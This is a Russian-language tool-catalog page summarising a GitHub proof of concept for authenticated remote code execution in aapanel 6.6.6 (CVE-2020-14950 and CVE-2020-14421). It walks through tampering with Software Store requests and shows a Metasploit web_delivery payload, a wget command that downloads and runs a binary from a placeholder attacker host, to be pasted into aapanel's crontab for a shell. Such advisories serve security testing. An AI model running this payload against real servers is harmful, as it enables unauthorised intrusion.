Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
aapanel — aapanel 6.6.6 — (аутентифицированное) удалённое выполнение кода | Kitploit
Инструменты/GitHubGitHub/jenaye/aapanel
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubjenaye/aapanel

aapanel

aapanel 6.6.6 — (аутентифицированное) удалённое выполнение кода

Репозиторий
2736 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

aapanel

aapanel 6.6.6 - CVE-2020-14950

  • Описание : позволяет удалённым аутентифицированным пользователям выполнять произвольные команды через меню настроек в «Sotfware Store».
  • Затронутые версии : Все <= 6.6.6

Информация

Чтобы создать этот PoC, я просто установил программное обеспечение с помощью docker-compose

  • Тип уязвимости : Удалённое выполнение команд (аутентифицированный RCE)

POC

Перейдите в «Software Store», нажмите на любую строку в поле настроек, перехватите запрос, когда вы нажмёте «start/stop/restart», и измените/отредактируйте запрос, чтобы выполнить то, что вам нужно. Вот пример с curl :

receStore receStore

aapanel 6.6.6 - CVE-2020-14421

  • Описание : Позволяет злоумышленнику удалённо выполнять произвольные команды
  • Затронутые версии : Все <= 6.6.6

Информация

Чтобы создать этот PoC, я установил чистую Ubuntu 20.04, затем установил wget + sudo и выполнил этот скрипт wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh

  • Тип уязвимости : Удалённое выполнение команд (аутентифицированный RCE)

POC

Прежде всего, настройте параметры web_delivery — это создаст полезную нагрузку и прослушиватель.

web_delivery

Теперь запустите его

run

это создаст следующую полезную нагрузку:

wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown

Затем скопируйте/вставьте это в script content меню crontab в aapanel.

cron

Теперь просто выполните свой crontab и дождитесь своей сессии.

command

Быстрый эксплойт

Просто запустите msfconsole -r aapanel.rc, скопируйте/вставьте полезную нагрузку в раздел script content и наслаждайтесь сессией.

Скачать инструмент